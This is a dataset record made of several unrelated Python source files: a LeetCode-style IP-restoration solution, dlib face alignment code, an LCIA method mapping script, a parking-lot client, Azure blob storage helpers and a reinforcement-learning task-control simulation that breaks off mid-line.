'x_factor': 1,\n 'y_factor': 1,\n 'pad_top': 0,\n 'pad_left': 0,\n })\n generator = PascalVOCGenerator(logger, config)\n self.label_names.update(generator.label_names)\n","sub_path":"extractor/core/data/labelbox.py","file_name":"labelbox.py","file_ext":"py","file_size_in_byte":6862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"650018355","text":"class Solution(object):\n def check(self, s):\n if len(s) < 2:\n return True\n elif len(s) == 2:\n return \"10\" <= s <= \"99\" # prevent 01,02,03...\n else:\n return \"100\" <= s <= \"255\" # prevent 256,257...\n\n def dfs(self, depth, maxDepth, s, startPos, pos, ans):\n\n if depth == maxDepth:\n if startPos == len(s):\n address = s[0:pos[0]]\n for i in range(1, maxDepth):\n address = address + '.' + s[pos[i - 1]:pos[i]]\n ans.append(address)\n return\n\n for i in range(startPos + 1, startPos + 4):\n if self.check(s[startPos: i]):\n pos[depth] = i\n self.dfs(depth + 1, 4, s, i, pos, ans)\n\n def restoreIpAddresses(self, s):\n \"\"\"\n :type s: str\n :rtype: List[str]\n \"\"\"\n ans = []\n pos = [0, 0, 0, 0]\n self.dfs(0, 4, s, 0, pos, ans)\n\n\ns = Solution()\ns.restoreIpAddresses(\"0000\")","sub_path":"Algorithm/Restore IP Addresses/Restore IP Addresses.py","file_name":"Restore IP Addresses.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589016206","text":"from enum import Enum\n\nimport dlib\nimport numpy as np\nimport skimage.transform as tr\n\n\nclass FaceDetectorException(Exception):\n pass\n\n\nclass FaceDetector:\n def __init__(self):\n self.detector = dlib.get_frontal_face_detector()\n\n def detect_faces(self, image, *, upscale_factor=1, greater_than=None, get_top=None):\n try:\n face_rects = list(self.detector(image, upscale_factor))\n except Exception as e:\n raise FaceDetectorException(e.args)\n\n if greater_than is not None:\n face_rects = list(\n filter(\n lambda r: r.height() > greater_than and r.width() > greater_than,\n face_rects,\n )\n )\n\n face_rects.sort(key=lambda r: r.width() * r.height(), reverse=True)\n\n if get_top is not None:\n return face_rects[:get_top]\n\n return face_rects\n\n\nclass FaceAlignMask(Enum):\n INNER_EYES_AND_BOTTOM_LIP = [39, 42, 57]\n OUTER_EYES_AND_NOSE = [36, 45, 33]\n\n\nclass FaceAligner:\n def __init__(self, dlib_predictor_path, face_template_path):\n self.predictor = dlib.shape_predictor(dlib_predictor_path)\n self.face_template = np.load(face_template_path)\n\n def get_landmarks(self, image, face_rect):\n points = self.predictor(image, face_rect)\n return np.array(list(map(lambda p: [p.x, p.y], points.parts())))\n\n def align_face(\n self,\n image,\n face_rect,\n *,\n dim=96,\n border=0,\n mask=FaceAlignMask.INNER_EYES_AND_BOTTOM_LIP\n ):\n mask = np.array(mask.value)\n\n landmarks = self.get_landmarks(image, face_rect)\n proper_landmarks = border + dim * self.face_template[mask]\n A = np.hstack([landmarks[mask], np.ones((3, 1))]).astype(np.float64)\n B = np.hstack([proper_landmarks, np.ones((3, 1))]).astype(np.float64)\n T = np.linalg.solve(A, B).T\n\n return tr.warp(\n image,\n tr.AffineTransform(T).inverse,\n output_shape=(dim + 2 * border, dim + 2 * border),\n order=3,\n mode=\"constant\",\n cval=0,\n clip=True,\n preserve_range=True,\n )\n\n def align_faces(self, image, face_rects, *args, **kwargs):\n result = []\n\n for rect in face_rects:\n result.append(self.align_face(image, rect, *args, **kwargs))\n\n return result\n\n\ndef clip_to_range(img):\n return img / 255.0\n","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99807442","text":"# -*- coding: utf-8 -*-\nimport utils, os, pandas, numpy, MasterData, time\nfrom copy import copy\n\n#this script takes the mapping ILCD to ecoinvent and creates the \n#public excel file of the mapped CFs, and the standard method xlsx\n\ndef apply_status(x):\n if utils.is_empty(x[0]):\n return 'method orphan'\n elif utils.is_empty(x[1]):\n return 'ecoinvent orphan'\n else:\n return 'mapped'\n\ndef mapping_to_mapped(version):\n ecoQuery_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\internal\\LCIA management\\{}\\ecoQuery files'.format(version)\n mapping_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\internal\\LCIA management\\{}\\mapping files'.format(version)\n \n #load category mapping\n filename = 'category_mapping_{}.xlsx'.format(version)\n tab = 'categories'\n category_mapping = utils.read_excel(mapping_folder, filename, tab)\n tab = 'methods'\n method_uuid = utils.read_excel(mapping_folder, filename, tab)\n method_uuid = method_uuid.set_index('method')\n \n #load ee mapping\n filename = 'recipe_mapping_3.5.xlsx'\n tab = 'Sheet1'\n ee_mapping = utils.read_excel(mapping_folder, filename, tab)\n ee_mapping = utils.replace_empty_in_df(ee_mapping, '')\n category_mapping['ecoinvent name'] = category_mapping[\n ['category name in ecoinvent', 'indicator name in ecoinvent']].apply(\n lambda x: x[0] + '//' + x[1], axis = 1)\n dfs = []\n def apply_scaling(x):\n if utils.is_empty(x[1]):\n return ''\n else:\n return x[1] * x[0]\n def apply_mapped_correction(x):\n to_correct = False\n if x[0] == 'mapped':\n to_correct = True\n for u in tuple(x.to_dict().values())[1:]:\n if not utils.is_empty(u):\n to_correct = False\n break\n return to_correct\n for method_name in ['ReCiPe Midpoint (I) V1.13', 'ReCiPe Midpoint (H) V1.13', 'ReCiPe Midpoint (E) V1.13']:\n #load CFs\n print(method_name)\n tab = 'CFs'\n filename = method_uuid.loc[method_name, 'standard excel filename']\n method = utils.read_excel(ecoQuery_folder, filename, tab)\n index = ['simapro name', 'simapro compartment', 'simapro subcompartment', 'simapro unit']\n method = method.rename(columns = dict(zip(['substance', 'compartment', 'subcompartment', 'unit'], index)))\n df = ee_mapping.set_index(index).join(method.set_index(index), how = 'outer').reset_index()\n df = utils.replace_empty_in_df(df, '')\n for col in df:\n df = df.replace(to_replace = {col: {'(no match)': ''}})\n category_mapping_ = category_mapping[category_mapping['method name in ecoinvent'].apply(\n lambda x: method_name in x)]\n d = dict(zip(list(category_mapping_['category name in method']), list(category_mapping_['ecoinvent name'])))\n cols = list(d.keys())\n cols.insert(0, 'status')\n df['status'] = df[['ecoinvent name', 'simapro name']].apply(apply_status, axis = 1)\n c = df[cols].apply(apply_mapped_correction, axis = 1)\n for col in index:\n df.loc[c, col] = ''\n df.loc[c, 'status'] = 'ecoinvent orphan'\n df = df.rename(columns = d)\n #convert CFs using factor\n mapped = df[df['status'] == 'mapped']\n df = df[df['status'] != 'mapped']\n \n for col in d.values():\n mapped[col] = mapped[['conversion factor', col]].apply(apply_scaling, axis = 1)\n df = pandas.concat([mapped, df])\n \n #write mapped to excel\n df['comment'] = ''\n columns = [\n 'ecoinvent name', 'ecoinvent compartment', 'ecoinvent subcompartment', 'ecoinvent unit', \n 'simapro name', 'simapro compartment', 'simapro subcompartment', 'simapro unit', \n 'status', 'conversion factor', 'comment']\n columns.extend(tuple(d.values()))\n sel = utils.dataframe_to_series(method_uuid.loc[method_name])\n dfs.append((df, sel['tab in mapped'], columns))\n columns = ['method name in ecoinvent', 'category name in ecoinvent', 'indicator name in ecoinvent', 'unit']\n category_mapping = category_mapping.rename(columns = {'unit in ecoinvent': 'unit'})\n dfs.append((category_mapping, 'units', columns))\n \n read_me = read_me = [['', '']]*7#space for logo\n read_me.extend([\n ['© ecoinvent {}'.format(utils.timestamp().split('-')[0])], \n ['python script', os.path.realpath(__file__)], \n ['file generation date', utils.timestamp()], \n ['file purpose', 'This file shows the explicit correspondance between ecoinvent nomenclature, method nomenclature, and associated CFs'], \n ['method version', '1.13'], \n ['source', 'as found in Simapro'], \n ])\n filename = utils.remove_forbiden_in_filename(sel['mapped excel filename'].format(version))\n utils.dataframe_to_excel(ecoQuery_folder, filename, dfs, read_me = read_me, feedback = True)\nif __name__ == '__main__':\n mapping_to_mapped('3.5')","sub_path":"projects/LCIA_management/recipe/ReCiPe_mapping_to_mapped.py","file_name":"ReCiPe_mapping_to_mapped.py","file_ext":"py","file_size_in_byte":5029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"448032724","text":"\n# Este archivo es el encargado de recibir la placa leída y decidir si dejar\n# pasar a un vehículo o no, dependiendo de la configuración de este. Además,\n# busca si la placa está registrada en el sistema, en caso de estarlo, busca\n# el usuario asociado al vehículo.\n\n# Este archivo básicamente maneja las alertas que se generan en el sistema.\n\n\n# from ac_seguridad.models import *\nfrom mysocket import MySocket\nimport socket\nimport pdb\nimport sys\nimport requests\n# Constantes.\nNUM_PUERTA = 5\nRIF = \"12345\"\nHOST = \"localhost\"\nPORT = 8000\n#1234 acceso restringido\n#0000 acceso no restringido\n#pdb.set_trace()\n# Funciones\ndef leer_placa():\n placa = input(\"Placa: \")\n return placa\ndef leer_ticket():\n ticket = input(\"ticket: \")\n resgistrado = input(\"registrado(True,False): \")\n return ticket, resgistrado\n\n# Programa comienza aquí.\n# ref: https://docs.python.org/3/howto/sockets.html\n# Crear un socket como cliente.\nprint(\"Creando socket\")\n# socket_cliente = MySocket()\n# socket_cliente.connect(host=HOST, port=PORT)\nprint(\"Socket conectado.\")\n\n# Enviar primer mensaje:\n# Estructura del primer mensaje:\n# * RIF: lleno\n# * ticket: None.\n# * placa: llena.\n# * tipo: llena ('placa_leida')\n# * puerta: llena.\n# * lectura_automatica: llena, sus posibles valores son:\n # True: lectura realizada de forma automática\n # False: lentura realizada de forma manual\n # None: No aplica la información (ejemplo, mensajes servidor-cliente)\n# * registrado: llena, true o false\n\nprint(\"Preparando mensaje\")\nmensaje = dict()\nmensaje['estacionamiento'] = RIF\nmensaje['ticket'], mensaje['registrado'] = leer_ticket()\nmensaje['placa'] = leer_placa()\nmensaje['puerta'] = NUM_PUERTA\nmensaje['tipo'] = 'placa_leida_salida'\nmensaje['lectura_automatica']= True\n\n\n\n\nprint(\"Enviando mensaje: {}\".format(mensaje))\n# socket_cliente.sendall_json(mensaje)\n# socket_cliente.mysend(\"Hola, este es el mensaje\\0\".encode(encoding=\"utf-8\", errors=\"strict\"))\nurl = \"http://{}:{}/manejador/manejar_mensaje/\".format(HOST,PORT)\ndata_mensaje = mensaje\nrespuesta_request = requests.post(url, data=data_mensaje)\nrespuesta = respuesta_request.json()\nprint(\"Mensaje enviado\")\n\nprint(\"Recibiendo respuesta\")\n# respuesta = socket_cliente.receive()\nprint(\"Respuesta recibida: {}\".format(respuesta))\n\nif (respuesta['tipo'] == \"OK_salida_estacionamiento\"):\n print(\"Luz verde.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_placa\"):\n print(\"Luz roja.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_pagado\"):\n print(\"Luz roja.\")\n\nelif (respuesta['tipo'] == \"NO_ticket_no_encontrado\"):\n print(\"Luz roja.\")\n\nelse:\n print(\"Respuesta no válida\")\n\n# socket_cliente.sock.shutdown(socket.SHUT_WR)\n# socket_cliente.sock.close()\n","sub_path":"project/manejador/cliente_salida.py","file_name":"cliente_salida.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340249914","text":"minimum = 10\nd = {}\n\n\n# recurse 안에서 시계 / 반시계\n\ndef recurse(weak, dist, cnt, n, clockwise):\n global minimum\n global d\n print(56, weak, dist, cnt)\n if not weak:\n if minimum > cnt:\n minimum = cnt\n return\n elif len(weak) == 1:\n if minimum > cnt+1:\n minimum = cnt +1\n return\n else:\n key = tuple(sorted(list(weak)))\n if d.get(key):\n if len(d[key]) >= len(dist):\n return\n else:\n d[key] = dist\n else:\n d[key] = dist\n\n if dist:\n friend = dist.pop()\n else:\n return\n for w in weak:\n todo = weak.copy()\n #clock\n print(12, \"friend\", friend)\n steps = range(w, w+friend+1) if clockwise else range(w , w-friend-1, -1)\n for k in steps:\n k = k % n\n print(k, end=' ')\n if k in todo:\n todo.remove(k)\n print()\n if todo == weak: # 더 이상 답이 없음 => 지우려고 해봐도 안지워짐\n return\n else:\n recurse(todo, dist[:], cnt + 1, n, clockwise)\n\n #counter\n\n\ndef solution(n, weak, dist):\n global minimum\n global d\n minimum = 10\n d = {}\n dist = sorted(dist)\n recurse(set(weak), dist[:], 0, n, True)\n print(d)\n d = {}\n recurse(set(weak), dist[:], 0, n, False)\n print(d)\n return minimum\n\n\nprint(\"answer\", solution(12, [1, 5, 6, 10], [1, 2, 3, 4]))\nprint(\"answer\", solution(12, [1, 3, 4, 9, 10], [3, 5, 7]))\n","sub_path":"practice/programmers/외벽점검.py","file_name":"외벽점검.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"225985468","text":"from selenium import webdriver\nimport time \n\nlink = \"http://suninjuly.github.io/math.html\"\n\ntry:\n browser = webdriver.Chrome()\n browser.get(link)\n people_radio = browser.find_element_by_id(\"peopleRule\")\n people_checked = people_radio.get_attribute(\"checked\")\n\n robots_radio = browser.find_element_by_id(\"robotsRule\")\n robots_checked = robots_radio.get_attribute(\"checked\")\n\nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(10)\n # закрываем браузер после всех манипуляций\n browser.quit()\n\n# не забываем оставить пустую строку в конце файла","sub_path":"help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"113434115","text":"#!/usr/bin/env python\n#\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n\nimport datetime\nimport logging\nimport os\nimport urllib.parse\nfrom typing import Dict, Optional, Union, cast\n\nfrom azure.common import AzureHttpError, AzureMissingResourceHttpError\nfrom azure.storage.blob import BlobPermissions, BlockBlobService, ContainerPermissions\nfrom memoization import cached\nfrom onefuzztypes.primitives import Container\n\nfrom .storage import (\n StorageType,\n choose_account,\n get_accounts,\n get_storage_account_name_key,\n)\n\n\n@cached\ndef get_blob_service(account_id: str) -> BlockBlobService:\n logging.debug(\"getting blob container (account_id: %s)\", account_id)\n account_name, account_key = get_storage_account_name_key(account_id)\n service = BlockBlobService(account_name=account_name, account_key=account_key)\n return service\n\n\ndef get_service_by_container(\n container: Container, storage_type: StorageType\n) -> Optional[BlockBlobService]:\n account = get_account_by_container(container, storage_type)\n if account is None:\n return None\n service = get_blob_service(account)\n return service\n\n\ndef container_exists_on_account(container: Container, account_id: str) -> bool:\n try:\n get_blob_service(account_id).get_container_properties(container)\n return True\n except AzureHttpError:\n return False\n\n\ndef container_metadata(container: Container, account: str) -> Optional[Dict[str, str]]:\n try:\n result = get_blob_service(account).get_container_metadata(container)\n return cast(Dict[str, str], result)\n except AzureHttpError:\n pass\n return None\n\n\ndef get_account_by_container(\n container: Container, storage_type: StorageType\n) -> Optional[str]:\n accounts = get_accounts(storage_type)\n\n # check secondary accounts first by searching in reverse.\n #\n # By implementation, the primary account is specified first, followed by\n # any secondary accounts.\n #\n # Secondary accounts, if they exist, are preferred for containers and have\n # increased IOP rates, this should be a slight optimization\n for account in reversed(accounts):\n if container_exists_on_account(container, account):\n return account\n return None\n\n\ndef container_exists(container: Container, storage_type: StorageType) -> bool:\n return get_account_by_container(container, storage_type) is not None\n\n\ndef get_containers(storage_type: StorageType) -> Dict[str, Dict[str, str]]:\n containers: Dict[str, Dict[str, str]] = {}\n\n for account_id in get_accounts(storage_type):\n containers.update(\n {\n x.name: x.metadata\n for x in get_blob_service(account_id).list_containers(\n include_metadata=True\n )\n }\n )\n\n return containers\n\n\ndef get_container_metadata(\n container: Container, storage_type: StorageType\n) -> Optional[Dict[str, str]]:\n account = get_account_by_container(container, storage_type)\n if account is None:\n return None\n\n return container_metadata(container, account)\n\n\ndef create_container(\n container: Container,\n storage_type: StorageType,\n metadata: Optional[Dict[str, str]],\n) -> Optional[str]:\n service = get_service_by_container(container, storage_type)\n if service is None:\n account = choose_account(storage_type)\n service = get_blob_service(account)\n try:\n service.create_container(container, metadata=metadata)\n except AzureHttpError as err:\n logging.error(\n (\n \"unable to create container. account: %s \"\n \"container: %s metadata: %s - %s\"\n ),\n account,\n container,\n metadata,\n err,\n )\n return None\n\n return get_container_sas_url_service(\n container,\n service,\n read=True,\n add=True,\n create=True,\n write=True,\n delete=True,\n list=True,\n )\n\n\ndef delete_container(container: Container, storage_type: StorageType) -> bool:\n accounts = get_accounts(storage_type)\n for account in accounts:\n service = get_blob_service(account)\n if bool(service.delete_container(container)):\n return True\n\n return False\n\n\ndef get_container_sas_url_service(\n container: Container,\n service: BlockBlobService,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n) -> str:\n expiry = datetime.datetime.utcnow() + datetime.timedelta(days=30)\n permission = ContainerPermissions(read, add, create, write, delete, list)\n\n sas_token = service.generate_container_shared_access_signature(\n container, permission=permission, expiry=expiry\n )\n\n url = service.make_container_url(container, sas_token=sas_token)\n url = url.replace(\"?restype=container&\", \"?\")\n return str(url)\n\n\ndef get_container_sas_url(\n container: Container,\n storage_type: StorageType,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n) -> str:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to create container sas for missing container\")\n\n return get_container_sas_url_service(\n container,\n service,\n read=read,\n add=add,\n create=create,\n write=write,\n delete=delete,\n list=list,\n )\n\n\ndef get_file_sas_url(\n container: Container,\n name: str,\n storage_type: StorageType,\n *,\n read: bool = False,\n add: bool = False,\n create: bool = False,\n write: bool = False,\n delete: bool = False,\n list: bool = False,\n days: int = 30,\n hours: int = 0,\n minutes: int = 0,\n) -> str:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to find container: %s - %s\" % (container, storage_type))\n\n expiry = datetime.datetime.utcnow() + datetime.timedelta(\n days=days, hours=hours, minutes=minutes\n )\n permission = BlobPermissions(read, add, create, write, delete, list)\n\n sas_token = service.generate_blob_shared_access_signature(\n container, name, permission=permission, expiry=expiry\n )\n\n url = service.make_blob_url(container, name, sas_token=sas_token)\n return str(url)\n\n\ndef save_blob(\n container: Container,\n name: str,\n data: Union[str, bytes],\n storage_type: StorageType,\n) -> None:\n service = get_service_by_container(container, storage_type)\n if not service:\n raise Exception(\"unable to find container: %s - %s\" % (container, storage_type))\n\n if isinstance(data, str):\n service.create_blob_from_text(container, name, data)\n elif isinstance(data, bytes):\n service.create_blob_from_bytes(container, name, data)\n\n\ndef get_blob(\n container: Container, name: str, storage_type: StorageType\n) -> Optional[bytes]:\n service = get_service_by_container(container, storage_type)\n if not service:\n return None\n\n try:\n blob = service.get_blob_to_bytes(container, name).content\n return cast(bytes, blob)\n except AzureMissingResourceHttpError:\n return None\n\n\ndef blob_exists(container: Container, name: str, storage_type: StorageType) -> bool:\n service = get_service_by_container(container, storage_type)\n if not service:\n return False\n\n try:\n service.get_blob_properties(container, name)\n return True\n except AzureMissingResourceHttpError:\n return False\n\n\ndef delete_blob(container: Container, name: str, storage_type: StorageType) -> bool:\n service = get_service_by_container(container, storage_type)\n if not service:\n return False\n\n try:\n service.delete_blob(container, name)\n return True\n except AzureMissingResourceHttpError:\n return False\n\n\ndef auth_download_url(container: Container, filename: str) -> str:\n instance = os.environ[\"ONEFUZZ_INSTANCE\"]\n return \"%s/api/download?%s\" % (\n instance,\n urllib.parse.urlencode({\"container\": container, \"filename\": filename}),\n )\n","sub_path":"src/api-service/__app__/onefuzzlib/azure/containers.py","file_name":"containers.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"506180651","text":"import torch\r\nimport getopt\r\nimport sys\r\nimport csv\r\nimport os\r\nimport simulation as sim\r\nimport math\r\nfrom random import randint\r\nfrom analysis import gData, MODE_MAP\r\nfrom tqdm import tqdm\r\nfrom numpy.random import choice\r\nfrom torch.autograd import Variable\r\nimport pandas as pd\r\nimport analysis\r\n\r\nimport numpy as np\r\nfrom scipy.interpolate import pchip_interpolate\r\nimport matplotlib.pyplot as plt\r\nfrom analysis import save_plt_figure\r\n\r\nfrom mdp import MDP\r\nfrom sarsa import SARSA\r\nfrom forward import FORWARD\r\nfrom arbitrator import BayesRelEstimator, AssocRelEstimator, Arbitrator\r\nimport dill as pickle # see https://stackoverflow.com/questions/25348532/can-python-pickle-lambda-functions\r\nimport random\r\n\r\nfrom mdp import MDP\r\nfrom ddqn import DoubleDQN\r\nfrom sarsa import SARSA\r\nfrom forward import FORWARD\r\nfrom arbitrator import BayesRelEstimator, AssocRelEstimator, Arbitrator\r\nfrom analysis import gData, RESULTS_FOLDER, COLUMNS, DETAIL_COLUMNS\r\nfrom common import makedir\r\nimport analysis\r\nfrom math import ceil\r\n#from main import MODE_LIST\r\n# preset constants\r\nMDP_STAGES = 2\r\nTOTAL_EPISODES = 200\r\nTRIALS_PER_EPISODE = 80\r\nSPE_LOW_THRESHOLD = 0.3#0.3\r\nSPE_HIGH_THRESHOLD = 0.45#0.5\r\nRPE_LOW_THRESHOLD = 4\r\nRPE_HIGH_THRESHOLD = 9 #10\r\nMF_REL_HIGH_THRESHOLD = 0.8\r\nMF_REL_LOW_THRESHOLD = 0.5\r\nMB_REL_HIGH_THRESHOLD = 0.7\r\nMB_REL_LOW_THRESHOLD = 0.3\r\nCONTROL_REWARD = 1\r\nCONTROL_REWARD_BIAS = 0\r\nINIT_CTRL_INPUT = [10, 0.5]\r\nDEFAULT_CONTROL_MODE = 'max-spe'\r\nCONTROL_MODE = DEFAULT_CONTROL_MODE\r\nCTRL_AGENTS_ENABLED = True\r\nRPE_DISCOUNT_FACTOR = 0.003\r\nACTION_PERIOD = 3\r\nSTATIC_CONTROL_AGENT = False\r\nENABLE_PLOT = True\r\nDISABLE_C_EXTENSION = False\r\nLEGACY_MODE = False\r\nMORE_CONTROL_INPUT = True\r\nSAVE_CTRL_RL = False\r\nPMB_CONTROL = False\r\nTASK_TYPE = 2020\r\nMF_ONLY = False\r\nMB_ONLY = False\r\nReproduce_BHV = False\r\nsaved_policy_path = ''\r\nSession_block = False\r\nmode202010 = False\r\nDECAY_RATE = 0.5\r\nturn_off_tqdm = False\r\nCONTROL_resting = 99 #Intial duration for CONTROL agent resting\r\nmax_sbj = 82\r\n\r\nRESET = False\r\nSAVE_LOG_Q_VALUE = False\r\nMIXED_RANDOM_MODE = False\r\nRANDOM_MODE_LIST = ['min-rpe', 'max-rpe', 'min-spe', 'max-spe']\r\n\r\n\r\nerror_reward_map = {\r\n # x should be a 4-tuple: rpe, spe, mf_rel, mb_rel\r\n # x should be a 5-tuple: rpe, spe, mf_rel, mb_rel, PMB - updated\r\n 'min-rpe' : (lambda x: x[0] < RPE_LOW_THRESHOLD),\r\n 'max-rpe' : (lambda x: x[0] > RPE_HIGH_THRESHOLD),\r\n 'min-spe' : (lambda x: x[1] < SPE_LOW_THRESHOLD),\r\n 'max-spe' : (lambda x: x[1] > SPE_HIGH_THRESHOLD),\r\n 'min-mf-rel' : (lambda x: x[2] < MF_REL_LOW_THRESHOLD),\r\n 'max-mf-rel' : (lambda x: x[2] > MF_REL_HIGH_THRESHOLD),\r\n 'min-mb-rel' : (lambda x: x[3] < MB_REL_LOW_THRESHOLD),\r\n 'max-mb-rel' : (lambda x: x[3] > MB_REL_HIGH_THRESHOLD),\r\n 'min-rpe-min-spe' : lambda x: error_reward_map['min-rpe'](x) and error_reward_map['min-spe'](x),\r\n 'max-rpe-max-spe' : lambda x: error_reward_map['max-rpe'](x) and error_reward_map['max-spe'](x),\r\n 'min-rpe-max-spe' : lambda x: error_reward_map['min-rpe'](x) and error_reward_map['max-spe'](x),\r\n 'max-rpe-min-spe' : lambda x: error_reward_map['max-rpe'](x) and error_reward_map['min-spe'](x),\r\n 'random' : lambda x: 0\r\n}\r\n\r\n\r\ndef create_lst(x):\r\n return [x] * TRIALS_PER_EPISODE\r\n\r\nstatic_action_map = {\r\n 'min-rpe' : create_lst(0),\r\n 'max-rpe' : create_lst(3),\r\n 'min-spe' : create_lst(0),\r\n 'max-spe' : create_lst(1),\r\n 'min-rpe-min-spe' : create_lst(0),\r\n 'max-rpe-max-spe' : create_lst(3),\r\n 'min-rpe-max-spe' : create_lst(1),\r\n 'max-rpe-min-spe' : create_lst(2)\r\n}\r\n\r\ndef error_to_reward(error, PMB=0 , mode=DEFAULT_CONTROL_MODE, bias=CONTROL_REWARD_BIAS):\r\n \"\"\"Compute reward for the task controller. Based on the input scenario (mode), the reward function is determined from the error_reward_map dict.\r\n Args:\r\n error (float list): list with player agent's internal states. Current setting: RPE/SPE/MF-Rel/MB-Rel/PMB\r\n For the error argument, please check the error_reward_map\r\n PMB (float): PMB value of player agents. Currently duplicated with error argument.\r\n mode (string): type of scenario\r\n\r\n Return:\r\n action (int): action to take by human agent\r\n \"\"\"\r\n if TASK_TYPE == 2019:\r\n try:\r\n cmp_func = error_reward_map[mode]\r\n except KeyError:\r\n print(\"Warning: control mode {0} not found, use default mode {1}\".format(mode, DEFAULT_CONTROL_MODE))\r\n cmp_func = error_reward_map[DEFAULT_CONTROL_MODE]\r\n\r\n return cmp_func(error)\r\n elif TASK_TYPE == 2020 or TASK_TYPE == 2021:\r\n if mode == 'min-rpe':\r\n reward = (40 - error[0]) * 3\r\n elif mode == 'max-rpe':\r\n reward = error[0] * 10\r\n elif mode == 'min-spe':\r\n reward = (1 - error[1])*150\r\n elif mode == 'max-spe':\r\n reward = error[1]*200\r\n elif mode == 'min-rpe-min-spe':\r\n reward = ((40 - error[0]) * 3 + (1 - error[1]) * 150 ) /2\r\n elif mode == 'max-rpe-max-spe':\r\n reward = ((error[0]) * 10 + (error[1]) * 100) /2\r\n elif mode == 'min-rpe-max-spe':\r\n reward = ((40 - error[0]) * 3 + (error[1]) * 200) /2\r\n elif mode == 'max-rpe-min-spe':\r\n reward = ((error[0]) * 10 + (1 - error[1]) * 150) /2\r\n elif mode == 'random' :\r\n reward = 0\r\n\r\n if PMB_CONTROL:\r\n reward = reward-60*PMB\r\n\r\n return reward # -60*PMB\r\n# if cmp_func(error):\r\n# if CONTROL_REWARD < 0.5 :\r\n# return CONTROL_REWARD + bias\r\n# else :\r\n# return CONTROL_REWARD * ((2-PMB*2)**0.5) + bias\r\n# #return CONTROL_REWARD*(2-2*PMB) + bias\r\n# else:\r\n# return bias\r\n\r\ndef shuffle_simulation(CONTROL_MODE = 'max-rpe', policy_sbj_indx = 0):\r\n pol_list = ['max-spe','min-spe','max-rpe','min-rpe','min-rpe-min-spe','max-rpe-max-spe','min-rpe-max-spe','max-rpe-min-spe']\r\n pol = pol_list.index(CONTROL_MODE)\r\n\r\n params = []\r\n f = open('regdata.csv')\r\n data = f.readlines()\r\n for sbj in data:\r\n params.append(sbj.split(',')[:-1])\r\n f.close()\r\n for ii in range(len(params)):\r\n for jj in range(len(params[ii])):\r\n params[ii][jj] = float(params[ii][jj])\r\n\r\n\r\n pol_filename = 'history_results/Analysis-Object-'+CONTROL_MODE+'-{0:02d}'.format(policy_sbj_indx)+file_suffix+'.pkl'\r\n\r\n with open(pol_filename,'rb') as f:\r\n pol_sbj_data = pickle.load(f)\r\n NUM_EPISODES, NUM_FULL_FEATS_DATA = pol_sbj_data.data[pol_list[pol]][0].shape\r\n NUM_FULL_TRIALS, NUM_FULL_FEATS_DETAIL = pol_sbj_data.detail[pol_list[pol]][0].shape\r\n TRIALS_PER_EPISODE = ceil(NUM_FULL_TRIALS / NUM_EPISODES)\r\n PMB_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n RPE_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n SPE_shuffle = np.zeros((max_sbj, TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n Reward_shuffle=np.zeros((max_sbj,TOTAL_EPISODES*TRIALS_PER_EPISODE))\r\n Score_shuffle = np.zeros((max_sbj, TOTAL_EPISODES * TRIALS_PER_EPISODE))\r\n\r\n opt_index = pol_sbj_data.data[pol_list[pol]][0]['ctrl_reward'].loc[\r\n 0.2 * len(pol_sbj_data.data[pol_list[pol]][0]):].idxmax()\r\n opt_pol = pol_sbj_data.detail[pol_list[pol]][0]['action'].loc[\r\n opt_index * TRIALS_PER_EPISODE - TRIALS_PER_EPISODE:opt_index * TRIALS_PER_EPISODE - 1]\r\n\r\n\r\n for affected_sbj_indx in range(max_sbj):\r\n env = MDP(2, more_control_input=True, legacy_mode=False, task_type=TASK_TYPE)\r\n # initialize human agent one time\r\n sarsa = SARSA(env.action_space[MDP.HUMAN_AGENT_INDEX], env, learning_rate=params[affected_sbj_indx][5]) # SARSA model-free learner\r\n forward = FORWARD(env.observation_space[MDP.HUMAN_AGENT_INDEX],\r\n env.action_space[MDP.HUMAN_AGENT_INDEX],\r\n env.state_reward_func, env.output_states_offset, env.reward_map_func,\r\n learning_rate=params[affected_sbj_indx][5], disable_cforward=True) # forward model-based learner\r\n arb = Arbitrator(AssocRelEstimator(params[affected_sbj_indx][1], env.max_rpe),\r\n BayesRelEstimator(thereshold=params[affected_sbj_indx][0]),\r\n amp_mb_to_mf=params[affected_sbj_indx][2], amp_mf_to_mb=params[affected_sbj_indx][3], temperature=params[affected_sbj_indx][4], MB_ONLY = MB_ONLY, MF_ONLY= MF_ONLY)\r\n # register in the communication controller\r\n env.agent_comm_controller.register('model-based', forward)\r\n for episode in tqdm(range(TOTAL_EPISODES)):\r\n if episode > CONTROL_resting:\r\n env = 